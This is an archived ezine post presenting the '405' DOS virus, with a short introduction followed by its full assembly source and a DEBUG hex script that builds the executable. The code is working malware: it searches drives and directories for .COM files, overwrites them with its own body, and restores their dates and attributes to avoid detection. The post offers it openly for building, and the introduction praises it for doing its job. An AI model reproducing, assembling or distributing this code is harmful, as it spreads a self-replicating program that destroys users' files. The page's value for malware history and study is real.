Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SOURCE00.005 - The 405 Virus [Source/Debug Script]

eZine's profile picture
eZine lover (@eZine)
Published in 
Source
 · 2 years ago

Here is an example of a stealth virus. It tries to hide itself from being detected by use of restoring date/time and attributes. It also moves across drives, which is not that hard to do, but you don't find a substantial amount of viruses which do that. Some of the coding is interesting, as this is not a very well optimized virus, but never-the-less, it does do it's job, and is fairly small (398 Bytes). 

[--- Cut Here -----------------------------------------------------------------] 

data_1e         equ     9Eh 
data_10e	equ	295h			;* 
data_11e	equ	297h			;* 
data_13e	equ	0E000h			;* 
data_15e	equ	0E195h			;* 

seg_a		segment	byte public 
		assume	cs:seg_a, ds:seg_a 

 
		org	100h 

v405             proc    far 

start: 
		xchg	ax,si 
		add	[bx+si],al 
		sahf				; Store ah into flags 
		add	[bx+si],al 
		nop 
		mov	ax,0 
		mov	byte ptr es:[249h],al 
		mov	byte ptr es:[24Bh],al 
		mov	es:data_7,al 
		push	ax 
		mov	ah,19h 
		int	21h			; DOS Services  ah=function 19h 
						;  get default drive al  (0=a:) 
		mov	byte ptr es:[249h],al 
		mov	ah,47h			; 'G' 
		add	al,1 
		push	ax 
		mov	dl,al 
		lea	si,ds:[24Bh]		; Load effective addr 
		int	21h			; DOS Services  ah=function 47h 
						;  get present dir,drive dl,1=a: 
						;   ds:si=ASCIIZ directory name 
		pop	ax 
		mov	ah,0Eh 
		sub	al,1 
		mov	dl,al 
		int	21h			; DOS Services  ah=function 0Eh 
						;  set default drive dl  (0=a:) 
		mov	es:data_7,al 
loc_1: 
		mov	al,byte ptr es:[249h] 
		cmp	al,0 
		jne	loc_2			; Jump if not equal 
		mov	ah,0Eh 
		mov	dl,2 
		int	21h			; DOS Services  ah=function 0Eh 
						;  set default drive dl  (0=a:) 
		mov	ah,19h 
		int	21h			; DOS Services  ah=function 19h 
						;  get default drive al  (0=a:) 
		mov	byte ptr es:[24Ah],al 
		jmp	short loc_4 
		db	90h 
loc_2: 
		cmp	al,1 
		jne	loc_3			; Jump if not equal 
		mov	ah,0Eh 
		mov	dl,2 
		int	21h			; DOS Services  ah=function 0Eh 
						;  set default drive dl  (0=a:) 
		mov	ah,19h 
		int	21h			; DOS Services  ah=function 19h 
						;  get default drive al  (0=a:) 
		mov	byte ptr es:[24Ah],al 
		jmp	short loc_4 
		db	90h 
loc_3: 
		cmp	al,2 
		jne	loc_4			; Jump if not equal 
		mov	ah,0Eh 
		mov	dl,0 
		int	21h			; DOS Services  ah=function 0Eh 
						;  set default drive dl  (0=a:) 
		mov	ah,19h 
		int	21h			; DOS Services  ah=function 19h 
						;  get default drive al  (0=a:) 
		mov	byte ptr es:[24Ah],al 
loc_4: 
		mov	ah,4Eh			; 'N' 
		mov	cx,1 
		lea	dx,data_8		; Load effective addr 
		int	21h			; DOS Services  ah=function 4Eh 
						;  find 1st filenam match @ds:dx 
		jc	loc_5			; Jump if carry Set 
		jmp	short loc_7 
		db	90h 
loc_5: 
		mov	ah,3Bh			; ';' 
		lea	dx,ds:data_11e		; Load effective addr 
		int	21h			; DOS Services  ah=function 3Bh 
						;  set current dir, path @ ds:dx 
		mov	ah,4Eh			; 'N' 
		mov	cx,11h 
		lea	dx,data_9		; Load effective addr 
		int	21h			; DOS Services  ah=function 4Eh 
						;  find 1st filenam match @ds:dx 
		jc	loc_1			; Jump if carry Set 
		jmp	short loc_4 
loc_6: 
		mov	ah,4Fh			; 'O' 
		int	21h			; DOS Services  ah=function 4Fh 
						;  find next filename match 
		jc	loc_5			; Jump if carry Set 
		jmp	short loc_7 
		db	90h 
loc_7: 
		mov	ah,3Dh			; '=' 
		mov	al,2 
		mov	dx,data_1e 
		int	21h			; DOS Services  ah=function 3Dh 
						;  open file, al=mode,name@ds:dx 
		mov	bx,ax 
		mov	ah,3Fh			; '?' 
		mov	cx,195h 
		nop 
		mov	dx,data_13e 
		nop 
		int	21h			; DOS Services  ah=function 3Fh 
						;  read file, bx=file handle 
						;   cx=bytes to ds:dx buffer 
		mov	ah,3Eh			; '>' 
		int	21h			; DOS Services  ah=function 3Eh 
						;  close file, bx=file handle 
		mov	bx,es:data_13e 
		cmp	bx,9600h 
		je	loc_6			; Jump if equal 
		mov	ah,43h			; 'C' 
		mov	al,0 
		mov	dx,data_1e 
		int	21h			; DOS Services  ah=function 43h 
						;  get attrb cx, filename @ds:dx 
		mov	ah,43h			; 'C' 
		mov	al,1 
		and	cx,0FEh 
		int	21h			; DOS Services  ah=function 43h 
						;  set attrb cx, filename @ds:dx 
		mov	ah,3Dh			; '=' 
		mov	al,2 
		mov	dx,data_1e 
		int	21h			; DOS Services  ah=function 3Dh 
						;  open file, al=mode,name@ds:dx 
		mov	bx,ax 
		mov	ah,57h			; 'W' 
		mov	al,0 
		int	21h			; DOS Services  ah=function 57h 
						;  get file date+time, bx=handle 
						;   returns cx=time, dx=time 
		push	cx 
		push	dx 
		mov	dx,cs:data_10e 
		mov	cs:data_15e,dx 
		mov	dx,word ptr cs:data_13e+1 
		lea	cx,cs:[194h]		; Load effective addr 
		sub	dx,cx 
		mov	cs:data_10e,dx 
		mov	ah,40h			; '@' 
		mov	cx,195h 
		nop 
		lea	dx,ds:[100h]		; Load effective addr 
		int	21h			; DOS Services  ah=function 40h 
						;  write file  bx=file handle 
						;   cx=bytes from ds:dx buffer 
		mov	ah,57h			; 'W' 
		mov	al,1 
		pop	dx 
		pop	cx 
		int	21h			; DOS Services  ah=function 57h 
						;  set file date+time, bx=handle 
						;   cx=time, dx=time 
		mov	ah,3Eh			; '>' 
		int	21h			; DOS Services  ah=function 3Eh 
						;  close file, bx=file handle 
		mov	dx,cs:data_15e 
		mov	cs:data_10e,dx 
		jmp	short $+3		; delay for I/O 
		nop 
		mov	ah,0Eh 
		mov	dl,byte ptr cs:[249h] 
		int	21h			; DOS Services  ah=function 0Eh 
						;  set default drive dl  (0=a:) 
		mov	ah,3Bh			; ';' 
		lea	dx,ds:[24Ah]		; Load effective addr 
		int	21h			; DOS Services  ah=function 3Bh 
						;  set current dir, path @ ds:dx 
		mov	ah,0 
		int	21h			; DOS Services  ah=function 00h 
						;  terminate, cs=progm seg prefx 
		add	al,[bx+si] 
		push	sp 
		inc	bp 
		push	bx 
		push	sp 
		db	60 dup (0) 
data_7		db	0Dh 
data_8		db	2Ah 
		db	 2Eh, 43h, 4Fh, 4Dh, 00h 
data_9		db	2Ah 
		db	 00h,0E9h 

v405             endp 

seg_a		ends 
		end	start 

[--- Cut Here -----------------------------------------------------------------] 

n 405.com 
e 0100  96 00 00 9E 00 00 90 B8 00 00 26 A2 49 02 26 A2 
e 0110  4B 02 26 A2 84 02 50 B4 19 CD 21 26 A2 49 02 B4 
e 0120  47 04 01 50 8A D0 BE 4B 02 CD 21 58 B4 0E 2C 01 
e 0130  8A D0 CD 21 26 A2 84 02 26 A0 49 02 3C 00 75 11 
e 0140  B4 0E B2 02 CD 21 B4 19 CD 21 26 A2 4A 02 EB 28 
e 0150  90 3C 01 75 11 B4 0E B2 02 CD 21 B4 19 CD 21 26 
e 0160  A2 4A 02 EB 13 90 3C 02 75 0E B4 0E B2 00 CD 21 
e 0170  B4 19 CD 21 26 A2 4A 02 B4 4E B9 01 00 BA 85 02 
e 0180  CD 21 72 03 EB 1F 90 B4 3B BA 97 02 CD 21 B4 4E 
e 0190  B9 11 00 BA 8B 02 CD 21 72 9E EB DC B4 4F CD 21 
e 01A0  72 E5 EB 01 90 B4 3D B0 02 BA 9E 00 CD 21 8B D8 
e 01B0  B4 3F B9 95 01 90 BA 00 E0 90 CD 21 B4 3E CD 21 
e 01C0  26 8B 1E 00 E0 81 FB 00 96 74 D1 B4 43 B0 00 BA 
e 01D0  9E 00 CD 21 B4 43 B0 01 81 E1 FE 00 CD 21 B4 3D 
e 01E0  B0 02 BA 9E 00 CD 21 8B D8 B4 57 B0 00 CD 21 51 
e 01F0  52 2E 8B 16 95 02 2E 89 16 95 E1 2E 8B 16 01 E0 
e 0200  B9 94 01 2B D1 2E 89 16 95 02 B4 40 B9 95 01 90 
e 0210  BA 00 01 CD 21 B4 57 B0 01 5A 59 CD 21 B4 3E CD 
e 0220  21 2E 8B 16 95 E1 2E 89 16 95 02 EB 01 90 B4 0E 
e 0230  2E 8A 16 49 02 CD 21 B4 3B BA 4A 02 CD 21 B4 00 
e 0240  CD 21 02 00 54 45 53 54 00 00 00 00 00 00 00 00 
e 0250  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
e 0260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
e 0270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
e 0280  00 00 00 00 0D 2A 2E 43 4F 4D 00 2A 00 E9 
rcx 
18E 
w 
q 

[--- Cut Here -----------------------------------------------------------------]


- Havoc

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
guest's profile picture
@guest
19 Nov 2024
Deliziosa!!!!!Assolutamente da provare questa domenica! Grazie per l'idea :D
guest's profile picture
@guest
19 Nov 2024
deve essere molto dolce, zucchero piu' lo zuccherino della frutta
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT